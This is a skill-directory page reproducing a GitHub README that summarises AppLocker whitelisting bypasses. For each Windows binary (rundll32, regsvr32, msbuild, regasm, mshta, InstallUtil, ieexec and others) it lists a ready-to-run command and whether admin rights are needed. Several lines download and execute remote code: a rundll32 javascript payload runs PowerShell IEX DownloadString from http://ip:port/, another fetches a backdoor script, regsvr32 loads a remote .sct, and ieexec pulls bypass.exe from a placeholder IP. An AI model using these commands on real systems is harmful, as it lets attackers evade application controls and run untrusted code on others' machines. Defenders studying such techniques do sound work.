SkillAgentSearch skills...

MyAPPLockerBypassSummary

Simple APPLocker bypass summary

Install / Use

/learn @0xVIC/MyAPPLockerBypassSummary
About this skill

Quality Score

0/100

Supported Platforms

Universal

README

myAPPLockerBypassSummary

Simple APPLocker bypass summary based on the extensive work of @api0cradle


  1. Rundll32.exe

rundll32.exe javascript:"..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');"

rundll32.exe javascript:"..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject("WScript.Shell");w.run("calc");window.close()");

rundll32.exe javascript:"..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}

rundll32.exe javascript:"..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test")

rundll32 shell32.dll,Control_RunDLL payload.dll

  • Requires admin: No
  • Windows binary: Yes
  • Bypasses AppLocker Default rules: No

Notes: I only tested on Windows 10 against the default rules, it could work against older Windows versions.

  • Links:
    • https://pentestlab.blog/2017/05/23/applocker-bypass-rundll32/
    • https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_7
    • https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Rundll32.md
    • https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/

  1. Regsvr32.exe

regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll

  • Requires admin: No
  • Windows binary: Yes
  • Bypasses AppLocker Default rules: No

Notes: I only tested on Windows 10 against the default rules, it could work against older Windows versions.

  • Links:
    • https://gist.github.com/subTee/24c7d8e1ff0f5602092f58cbb3f7d302
    • https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Regsvr32.md

  1. Msbuild.exe

msbuild.exe pshell.xml

  • Requires admin: No
  • Windows binary: Yes
  • Bypasses AppLocker Default rules: Yes

Notes:

  • Links:
    • https://gist.github.com/subTee/6b236083da2fd6ddff216e434f257614
    • http://subt0x10.blogspot.no/2017/04/bypassing-application-whitelisting.html
    • https://github.com/Cn33liz/MSBuildShell
    • https://github.com/Cn33liz/MS17-012
    • https://pentestlab.blog/2017/05/29/applocker-bypass-msbuild/
    • https://www.youtube.com/watch?v=aSDEAPXaz28
    • https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Trusted_Developer_Utilities.md
    • https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/

  1. Regsvcs.exe

regsvcs.exe /U regsvcs.dll

regsvcs.exe regsvcs.dll

  • Requires admin: No
  • Windows binary: Yes
  • Bypasses AppLocker Default rules: Yes

Notes:

  • Links:
    • https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/
    • https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/RegSvcsRegAsmBypass.cs
    • https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/RegsvcsRegasm.md
    • https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/

  1. Regasm.exe

regasm.exe /U regsvcs.dll

regasm.exe regsvcs.dll

  • Requires admin: /U does not require admin
  • Windows binary: Yes
  • Bypasses AppLocker Default rules: Yes

Notes:

  • Links:
    • https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/
    • https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/RegSvcsRegAsmBypass.cs
    • https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/RegsvcsRegasm.md
    • https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/

  1. Bginfo.exe

bginfo.exe bginfo.bgi /popup /nolicprompt

  • Requires admin: No
  • Windows binary: No
  • Bypasses AppLocker Default rules: No

Notes: Will work if BGinfo.exe is located in a path that is trusted by the policy.

  • Links:
    • https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/
    • https://oddvar.moe/2017/05/22/clarification-bginfo-4-22-applocker-still-vulnerable/
    • https://pentestlab.blog/2017/06/05/applocker-bypass-bginfo/

  1. InstallUtil.exe

InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll

  • Requires admin: No
  • Windows binary: Yes
  • Bypasses AppLocker Default rules: Yes

Notes:

  • Links:
    • https://github.com/subTee/AllTheThings
    • https://pentestlab.blog/2017/05/08/applocker-bypass-installutil/
    • https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_12
    • http://subt0x10.blogspot.no/2017/09/banned-file-execution-via.html
    • https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/InstallUtil.md
    • https://www.blackhillsinfosec.com/powershell-without-powershell-how-to-bypass-application-whitelisting-environment-restrictions-av/
    • https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/

  1. MSDT.exe

Open .diagcab package

  • Requires admin: No
  • Windows binary: Yes
  • Bypasses AppLocker Default rules: ?

Notes:

  • Links:
    • https://cybersyndicates.com/2015/10/a-no-bull-guide-to-malicious-windows-trouble-shooting-packs-and-application-whitelist-bypass/
    • https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/

  1. mshta.exe

mshta.exe evilfile.hta

  • Requires admin: No
  • Windows binary: Yes
  • Bypasses AppLocker Default rules: Yes

Notes:

  • Links:
    • https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_4
    • https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/

  1. Execute .Bat

cmd.exe /k < script.txt

  • Requires admin: No
  • Windows binary: Yes
  • Bypasses AppLocker Default rules: No

Notes:

  • Links:
    • https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_3
    • https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/

  1. Execute .PS1

Get-Content script.txt | iex

  • Requires admin: No
  • Windows binary: Yes
  • Bypasses AppLocker Default rules: No

Notes:

  • Links:
    • https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_3
    • https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/

  1. Execute .VBS

cscript.exe //E:vbscript script.txt

  • Requires admin: No
  • Windows binary: Yes
  • Bypasses AppLocker Default rules: No

Notes:

  • Links:
    • https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_3
    • https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/

  1. PresentationHost.exe

Missing Example

  • Requires admin: No
  • Windows binary: Yes
  • Bypasses AppLocker Default rules: ?

Notes:

  • Links:
    • https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf
    • https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/

  1. dfsvc.exe

Missing Example

  • Requires admin: ?
  • Windows binary: Yes
  • Bypasses AppLocker Default rules: ?

Notes:

  • Links:
    • https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf

  1. IEExec.exe

ieexec.exe http://x.x.x.x:8080/bypass.exe

  • Requires admin: ?
  • Windows binary: Yes
  • Bypasses AppLocker Default rules: ?

Notes:

  • Links:
    • https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/

  1. cdb.exe

cdb.exe -cf x64_calc.wds -o notepad.exe

  • Requires admin: ?
  • Windows binary: No
  • Bypasses AppLocker Default rules: ?

Notes:

  • Links:
    • http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html

  1. dnx.exe

dnx.exe consoleapp

  • Requires admin: ?
  • Windows binary: No
  • Bypasses AppLocker Default rules: ?

Notes:

  • Links:
    • https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/

  1. rcsi.exe

rcsi.exe bypass.csx

  • Requires admin: ?
  • Windows binary: No
  • Bypasses AppLocker Default rules: ?

Notes:

  • Links:
    • https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/

  1. csi.exe

Missing example

  • Requires admin: ?
  • Windows binary: No
  • Bypasses AppLocker Default rules: ?

Notes:

  • Links:
    • https://web.archive.org/web/20161008143428/
    • http://subt0x10.blogspot.com/2016/09/application-whitelisting-bypass-csiexe.html

  1. CPL loading location manipulation

Control.exe

  • Requires admin: No
  • Windows binary: Yes
  • Bypasses AppLocker Default ru
View on GitHub
GitHub Stars47
CategoryDevelopment
Updated4mo ago
Forks16

Security Score

72/100

Audited on Nov 18, 2025

No findings